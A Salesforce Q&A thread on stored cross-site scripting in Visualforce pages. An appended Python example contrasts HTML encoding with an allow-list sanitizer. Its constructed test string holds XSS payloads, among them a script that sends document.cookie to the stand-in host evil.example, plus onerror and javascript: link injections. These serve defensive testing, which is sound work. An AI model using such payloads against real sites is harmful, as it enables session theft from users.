[SalesForce] How to display custom HTML in the Visualforce Page

I created a Visualforce page, and I get some data (HTML) from a web service and store it in a custom object as a Long Text field. When I retrieve it and display it in my Visualforce page with something like this

<apex:outputText value="{!myobjdata}" escape="false"/>

it works fine. But when I submit my application for review, the Security Scanner reports an error (XSS_STORED) for the line above and for the SELECT query on my object in the class file.

Then I read about this XSS issue, and I added my data to the Visualforce page as below:

<apex:outputText value="{!HTMLENCODE(myobjdata)}" escape="false"/>

But now the data (HTML) in my object is shown literally, like

<div><ul>someinfo<li>point1</li><li>point2</li></ul></div>

in my Visualforce page. The HTML content is not rendered. How can I overcome these issues (mainly XSS)?

Please help

Best Answer

If you want to render HTML from an Apex controller into a component unescaped, you need to make sure that there is no active content; otherwise you will have a stored cross-site scripting vulnerability. Currently the only (sane) way to do this is to pull the HTML from a rich text field. This will sanitize the HTML and make it safe for rendering via an escape="false" attribute.

The scanner will still complain because the scanner doesn't know about data types. That's fine; it's a false positive, and you will always get false positives. It won't cause trouble for you in the security review -- just make a note that this is coming from a Rich Text Field and so is safe to render unescaped.

So the real issue is whether the HTML is safe to render or not. If it's safe, then ignore the scanner; if it's not safe, you need to make it safe by storing it in a rich text field and then pulling it back out.

If it's not safe, and you try to trick the scanner by first encoding and then unencoding before rendering, then you will succeed in both tricking the scanner and inserting a vulnerability into your application, violating the Master Services Agreement that you signed, and compromising the security of anyone using this code.

The scanner is a tool meant to help you by pointing out possible issues in your code, but what matters is the actual security of your code.
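
The two approaches in the answer above, shown side by side as an added example (this is not code from the original post, and it is not Salesforce's rich text sanitizer; that is different code with its own rules). The first function does what HTMLENCODE does: it encodes every tag, so nothing is active but nothing renders either, which is exactly the symptom in the question. The second is a small allow-list sanitizer built on Python's standard library: it keeps inert markup such as div/ul/li, drops <script> together with its contents, strips event-handler attributes such as onerror=, and rejects javascript: URLs, which is the property "no active content" that makes unescaped rendering safe. The allowed tag and attribute lists and the payload string are constructed for this example.

```python
import html
from html.parser import HTMLParser

# Hypothetical allow-list for this example; a production policy needs its own review.
ALLOWED_TAGS = {"div", "p", "ul", "ol", "li", "b", "i", "strong", "em", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}

# Constructed sample: the legitimate markup from the question plus three
# injected payloads a malicious web service response could carry.
CONSTRUCTED_PAYLOAD = (
    '<div><ul>someinfo<li>point1</li><li>point2</li></ul></div>'
    '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    '<img src=x onerror="alert(1)">'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="https://example.com">ok</a>'
)


def encode_only(stored: str) -> str:
    """What HTMLENCODE does: every '<' becomes '&lt;', so the markup is displayed
    as text instead of being rendered. Safe, but useless for HTML content."""
    return html.escape(stored, quote=True)


class AllowListSanitizer(HTMLParser):
    """Re-serialises the input keeping only allow-listed tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # > 0 while inside <script> or <style>, whose text is discarded

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            # Unknown tags are dropped; their text is kept, except for script/style.
            if tag in ("script", "style"):
                self.drop_depth += 1
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # silently removes onerror=, onclick=, style=, ...
            if name == "href" and not (value or "").lower().lstrip().startswith(SAFE_URL_SCHEMES):
                continue  # blocks javascript: and data: URLs
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped on output, so '<' in text can never become a tag.
        if self.drop_depth == 0:
            self.out.append(html.escape(data, quote=False))


def sanitize(stored: str) -> str:
    """Return HTML with no active content, suitable for rendering unescaped."""
    parser = AllowListSanitizer()
    parser.feed(stored)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print("encoded  :", encode_only(CONSTRUCTED_PAYLOAD))
    print("sanitized:", sanitize(CONSTRUCTED_PAYLOAD))
```

Running it shows the difference the answer is describing: the encoded version contains no tags at all, while the sanitized version still contains the div/ul/li structure but neither the script, the onerror handler nor the javascript: link. Note that the sanitizer is an allow-list, not a block-list; anything it does not recognise is removed rather than passed through.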
